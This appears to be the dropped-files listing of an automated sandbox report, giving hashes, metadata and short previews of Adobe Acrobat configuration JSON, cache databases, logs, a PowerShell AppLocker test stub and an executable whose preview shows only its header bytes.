                    SHA-256:810A0B03A031D5D063D9331C77C449815D906CBCF7B8D5D0659A3AB7A877B49C
                    SHA-512:F3296D483649D5034F39D41C561BC62FFDBEB4AA2C4D169248011D4FD95EF884D5E48EA5CE87A1B50B13759B1B57EEDE91160F359ACD73FF8611C91FCCFE8679
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):285
                    Entropy (8bit):5.30477624974985
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfPmwrPeUkwRe9:YvXKXv9A2vR/ZwHA/GH56Ukee9
                    MD5:CEAF99FC94957AD76FAC917912B3DA67
                    SHA1:146F5926C9514F7F995336476B314B0A3BE51CC8
                    SHA-256:56B7C84A9A87012B75211B4BAC4EE6DB9C30527626987786871CECCC9AFB64B1
                    SHA-512:F36E6AC17A2C8655EB471A7D73CEA21E9252005A51E27AD63CB8227BAB6F78C0AF3A5ED10BE454D02A46A0F054445CFD1DF52960B3F348A6AA33375EC111E0B0
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):292
                    Entropy (8bit):5.268828784276886
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfJWCtMdPeUkwRe9:YvXKXv9A2vR/ZwHA/GBS8Ukee9
                    MD5:373DACEA1153065057C750E320BDF643
                    SHA1:B81F36408F7721F088C09EDCC2BEF2AB68BF5C37
                    SHA-256:4ED9815107443190471E69675BDC646047B2D4B8E63F12B209C8A5F882533559
                    SHA-512:4CBA36F840921FB14FDC733A04FDDF78FE65C0F523AAE68D9972CE9C058F93572006119CEF431771FCBDCCBEE8A3918B459131BC27B29C0A562F4D25906891D1
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):289
                    Entropy (8bit):5.254518085911634
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJf8dPeUkwRe9:YvXKXv9A2vR/ZwHA/GU8Ukee9
                    MD5:FB1F775E6CEB0310F66E8B0E6F486031
                    SHA1:B9919B2398E84FC9CE063C9F46DBB4FC2C39698E
                    SHA-256:70F837F1FAC8F92781EF9C2157CB4D5426C80E1A5DE1B42F5EA848DCEF4622AB
                    SHA-512:59713D772C1C2E1246555024D6A78250CFC9DDD8CDE9EBF0769A5270BE1C99A6DA4DF93092C3EA7018E807471643180572E70D6B107DA0A76CE063F5CA99CFF0
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):292
                    Entropy (8bit):5.25338970676377
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfQ1rPeUkwRe9:YvXKXv9A2vR/ZwHA/GY16Ukee9
                    MD5:5FCC0E37342C548A0731B66B6AEB77F4
                    SHA1:F1A240B1D75C58F15D9A738138FA512C20BCBB32
                    SHA-256:64E4047217099828C0471ECFC7511FE36FB1675A75601832552EDFC401167660
                    SHA-512:7D32A880B6FE98B47D7ED0DD887D174F9BAF5953BF82F9030C9BF28BA89CF8745F1943D4925E22C2E9949648DCFC5BE452091A03F3E21C3397F103D7C6AE3CEE
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):289
                    Entropy (8bit):5.270752136735678
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfFldPeUkwRe9:YvXKXv9A2vR/ZwHA/Gz8Ukee9
                    MD5:6D12C7396CD667FD70C9B13173686911
                    SHA1:88E16FED742D20823ACF49764B619DBE14A1289D
                    SHA-256:994D6C11EDFE49287630A72E944535EF0738223ADD80D76FA81CED85622DDDE7
                    SHA-512:E6A3FEB33F2A4987E54FE95395D0902FBD86D3CFAD61169CE3CD55581A06C3B4F6CDC71E15182DCC300AF8BF1E92AD409C6BEBD6659E8A44A4E4E9048222695C
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):1372
                    Entropy (8bit):5.736747961605946
                    Encrypted:false
                    SSDEEP:24:Yv6Xv9PJhrKLgENRcbrZbq00iCCBrwJo++ns8ct4mFJNX:YvK9PJhrEgigrNt0wSJn+ns8cvFJR
                    MD5:801AD9213407B48661310ECC53E665E5
                    SHA1:A616170F2C7BE63D56AF7FEFB8FCF4D512E8584F
                    SHA-256:98527EE379B993447772CE069EDB6DE51B8EB2CCF19EF73A8DAEDD46D76AFE8F
                    SHA-512:A1C6A52328AF6DFF7C1313EA4C835C3E44E84317542B61B71DBA4FC6008E80E7A8E4753D7BBAE4608C848F3D37E374BD3B125BAEF04A5AE629E1596C1A734DE9
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"79887_247329ActionBlock_0","campaignId":79887,"containerId":"1","controlGroupId":"","treatmentId":"acc56846-d570-4500-a26e-7f8cf2b4acad","variationId":"247329"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJUcnkgQWNyb2JhdCBQcm8ifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNSIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTMiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIDctZGF5IHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0byBwcmVtaXVtIFBERiBhbmQgZS1zaWduaW5nIHRvb2xzLiIsImJ
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):289
                    Entropy (8bit):5.26258367632384
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfYdPeUkwRe9:YvXKXv9A2vR/ZwHA/Gg8Ukee9
                    MD5:2DF2F5EF27E5CCB990B2F631C36A9A5D
                    SHA1:AB0E17F1F923490285760D5D0694480FD24E6E8D
                    SHA-256:6CEE8A056C50C278B305E0294EA27CD45AE86EE5D4A77103610501B2F9043E1D
                    SHA-512:D05421B1EE1E590F854593503C7A7D9E039D97F0FBD639B0F978CBEA5EC9AA8EFD32A937BA2CE9FB9885C649C4F263E7563D97F2E0337B1B2DD52D6644A68A0F
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):1395
                    Entropy (8bit):5.773926556055866
                    Encrypted:false
                    SSDEEP:24:Yv6Xv9PJhWrLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNf:YvK9PJhWHgDv3W2aYQfgB5OUupHrQ9FX
                    MD5:167479D45C4CAD77073C99E840DB0771
                    SHA1:6785E168993A456BD59355311A16A591CB5C62D0
                    SHA-256:B3332AB19F9426FCDE4A8EE15CE5E5621C447E81D3D629476BA4CFFD02900AFC
                    SHA-512:350BA532B9810523A85AD3524CE0C81A4F68D8A3E098B6695C9E148910527D03A716EE20708CD65F8A5A5DF3A32C71C60A8C7155D93DDFC8BA6B422BB53AB26D
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):291
                    Entropy (8bit):5.246387930861458
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfbPtdPeUkwRe9:YvXKXv9A2vR/ZwHA/GDV8Ukee9
                    MD5:978596A3C34F6773BA9972F33602EA65
                    SHA1:66DA99A2F0CB4B9535F1B9EB1CD86D06856278C4
                    SHA-256:EF47C481FAEA8C32C5A10AE7BBF95259AE68A3443BCF1566B6D237FAA114F7B9
                    SHA-512:CA04C50FF72354A21395E4F6571892AEE230DF8FA3CF8C2796C3913FA2A7F1A0EFA8F94A955F5EEF0B567B8C90F52C03A9FB711E4CE4F17BECB62355532FA010
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):287
                    Entropy (8bit):5.245208847894071
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJf21rPeUkwRe9:YvXKXv9A2vR/ZwHA/G+16Ukee9
                    MD5:71CD05E195E4AB3ADB8E90878A2F0CCF
                    SHA1:5E06B66D7AB98D8FA2D412B71190E6C33E456B8F
                    SHA-256:FC6C6CFF6093848AD44E93002DAC35F7A9517DC4C9358F6E0BADC82B41707C5D
                    SHA-512:26ED74D49337961797D2283545BA57DC8258C50A04E56B8EE2176C9B5B4B3F335BC75630D91E28A95F7789F08DCC0370FD251CE226648F26A2656C56D18E9A12
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):289
                    Entropy (8bit):5.269696282607111
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfbpatdPeUkwRe9:YvXKXv9A2vR/ZwHA/GVat8Ukee9
                    MD5:A32ED0A91100A8685D127454FDB30FB3
                    SHA1:1D7E31D9BAEE371E0298C97DA467F5F4BF04866F
                    SHA-256:886A03BB7C7B6FBD9B597F0A19BCCBF0025C383467355A98BE4F0880BF5676DE
                    SHA-512:80FBB3258297A5781C98F2CFB889B1BD0DD4FA2D04829BE38F493F258D7A397444758250C3FCDF22C767B94AED2350D5C0A179637DDC608FA7CE943F2F96DCD0
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):286
                    Entropy (8bit):5.221957941621081
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfshHHrPeUkwRe9:YvXKXv9A2vR/ZwHA/GUUUkee9
                    MD5:EF56DCF146A852D40DBEBE31997FD9CC
                    SHA1:9822858AFF91E02A6A566B7E5B4CDAE40A3E3D46
                    SHA-256:F25C3456825B6E8F0FC4A8A657B4A704A8CB4E85D20387534201A6CE84786AA5
                    SHA-512:09524E65C87CB792B54CD1F5A51F00A540EF3C35671F982A8CC9179B16A187083A9B636062DC78276FD65131308B1A2A2B5C51DCAC5FE2F0546905E81AC3E461
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):782
                    Entropy (8bit):5.368542123438326
                    Encrypted:false
                    SSDEEP:12:YvXKXv9A2vR/ZwHA/GTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWIy:Yv6Xv9PJhj168CgEXX5kcIfANhC
                    MD5:6D530262715EC6273374F96BE757AA8A
                    SHA1:92DF02C19F98A04171A526427495984AA1369B44
                    SHA-256:51E4D84E3743EB38D0C03A10A0702E9B91B4E4E81A23B51E543C21633A97543C
                    SHA-512:5522FDF99CB23F3AF0B7FB6DEA346A985805EF274E802B70139FBCA40D900AFA51A43C0C331D9658754DFEBF8A5F1514C327168FCF8A31056E47119BF2826FFE
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1719917253753}}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4
                    Entropy (8bit):0.8112781244591328
                    Encrypted:false
                    SSDEEP:3:e:e
                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                    Malicious:false
                    Preview:....
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):2814
                    Entropy (8bit):5.125920434302803
                    Encrypted:false
                    SSDEEP:24:YNMtEDzJrHhCg0LCAZMt68trDWatayDh/PT2D0loSfjzGsj0SgP2nJFoS2k662Lh:Yq8F0LC+MtDdXPzG+TFTG6se+j9PqA
                    MD5:3F46777A1149F5CE3F4C9FF9AA27625B
                    SHA1:FA236FB2C2350739B776A828D992D92B7BE514B5
                    SHA-256:1E0A076B71E7BF6127D14F898CBD3E45DB427DBEB809517491050B6BC316F128
                    SHA-512:D606F31B738512C58A587DDC6F107D38CBF9FD8CE6B5291E37901816C68C328AD0399E44607C3820DE989B3ABEC13036930BB1C4B93D82B1CCC3E08115E2988C
                    Malicious:false
                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"f9035d150391cfec86a38b05a5af96d9","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1719917253000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"35730978be7033865fdb2ffdb3a6541c","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1372,"ts":1719917253000},{"id":"Edit_InApp_Aug2020","info":{"dg":"1d63afb1e69c14ea4c5731d1f0a8c94b","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":1719917253000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"546edb5dcd9ac4305061f3d8e88943e9","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1719917253000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"cff7d3a0a1e23af775bfea86b1e76473","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1719917253000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"003a212a7408b0de56fb2e18c2e4e150","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":289,"ts":171991
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                    Category:dropped
                    Size (bytes):12288
                    Entropy (8bit):1.3188888659123144
                    Encrypted:false
                    SSDEEP:24:TLKufx/XYKQvGJF7urs9Ohn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMeY/EtqVv:TGufl2GL7ms9WR1CPmPbPahYmypilI+g
                    MD5:694E688B24016449ACA742A1C884D103
                    SHA1:058B4E60BE8FA38C479B67D3363DAD60F69EAEEC
                    SHA-256:7EE3D3C333F4757F70437BAE3A816BF03EEAA80C9455651495EB4C8CAC7D4E00
                    SHA-512:774782594B88AD212CDB06771203544CF2C01F8DF5B9D3DBC852F76364F505DCD15860E2D7FCF5E9160DA3AC851E5FDF1B58B65DD13C699DE3209A1E89853A31
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:SQLite Rollback Journal
                    Category:dropped
                    Size (bytes):8720
                    Entropy (8bit):1.7803331494064196
                    Encrypted:false
                    SSDEEP:48:7MnWR1CPmPbPahYfypilIdqFl2GL7msC8:7CWfMwbPahekKVmsl
                    MD5:8B1DA192B39FCDEA43AA4DEBA0337621
                    SHA1:FB293D6475BC5DA2D87CC96CE71C188964A07712
                    SHA-256:A0C711A07AEE2563EC03E1013323A208CB0D70EAC01A47733150636BD89FD06A
                    SHA-512:89814D52FC1D3C2BF381EF3985A95CCDBFD346AB9F085617AEC596F126DF6DC7AB39594DA8430F70C82D75402C18BA2FD3DE5B48774499EC14755D7009E399A2
                    Malicious:false
                    Preview:.... .c.....=0............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\System32\mshta.exe
                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):200872
                    Entropy (8bit):4.619573102182415
                    Encrypted:false
                    SSDEEP:768:csfY5DRtOhVkzDOWsfY5DRtOhVkzDOsgizsfY5DRtOhVkzDOfFsfY5DRtOhVkzDO:cz+kOWz+kO/izz+kONz+kO
                    MD5:909D871CCE2252C985F9AADEDB2A754D
                    SHA1:902AF292DFB83C31BFF0F96341A24B998689B2C6
                    SHA-256:9D9CFD342000AD5655052B050ABD59AFD502E4E570335C5922DA03C117EC2749
                    SHA-512:D1C03FAEF0B83404C15D2F1580F93E3EDB8FA454D5912DDF77F8C1DDA85836E463DAA6FD30FC4200218BE39C5E702D0DB7D7BDF232F4F8BB8DB88C10D188F30F
                    Malicious:false
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............N...N...N..O...N..O...N..O...N..O...N...N...N..O...N.3N...N..O...NRich...N................PE..L...J.\-.....................~...............0....@.................................`.....@...... ...........................@..d....`..ho..........................0...T............................................@.......".......................text............................... ..`.data...|....0......................@....idata..D....@......................@..@.didat.......P......."..............@....rsrc...ho...`...p...$..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):64
                    Entropy (8bit):0.34726597513537405
                    Encrypted:false
                    SSDEEP:3:Nlll:Nll
                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                    Malicious:false
                    Preview:@...e...........................................................
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):246
                    Entropy (8bit):3.5309417490522437
                    Encrypted:false
                    SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8gVk+g:Qw946cPbiOxDlbYnuRKLVk+g
                    MD5:F43F04525A92586BA2F1E65E1DEB9D7F
                    SHA1:37FE16B03DD5084BA24B6746E97E88B4F71E1F14
                    SHA-256:9E3A37C20E01B4800288E87CC16DA70FB06BD6BA30D4987E74366733F3AA8CD2
                    SHA-512:F1258B0BB7889D137B1BA022B8F0CD6F20C006DFF1C2A7489A6C8F7EC0677FC9EB8B863BDA4B05BDD04E51AD8DCC7446D5E7D9EA86CAC05B911E1171CDF70E22
                    Malicious:false
                    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.2./.0.7./.2.0.2.4. . .0.6.:.4.7.:.3.5. .=.=.=.....
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:ASCII text, with very long lines (393)
                    Category:dropped
                    Size (bytes):16525
                    Entropy (8bit):5.33860678500249
                    Encrypted:false
                    SSDEEP:384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B
                    MD5:C3FEDB046D1699616E22C50131AAF109
                    SHA1:C9EEA5A1A16BD2CD8154E8C308C8A336E990CA8D
                    SHA-256:EA948BAC75D609B74084113392C9F0615D447B7F4AACA78D818205503EACC3FD
                    SHA-512:845CDB5166B35B39215A051144452BEF9161FFD735B3F8BD232FB9A7588BA016F7939D91B62E27D6728686DFA181EFC3F3CC9954B2EDAB7FC73FCCE850915185
                    Malicious:false
                    Preview:SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:080+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig:
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                    Category:dropped
                    Size (bytes):15114
                    Entropy (8bit):5.301382093997458
                    Encrypted:false
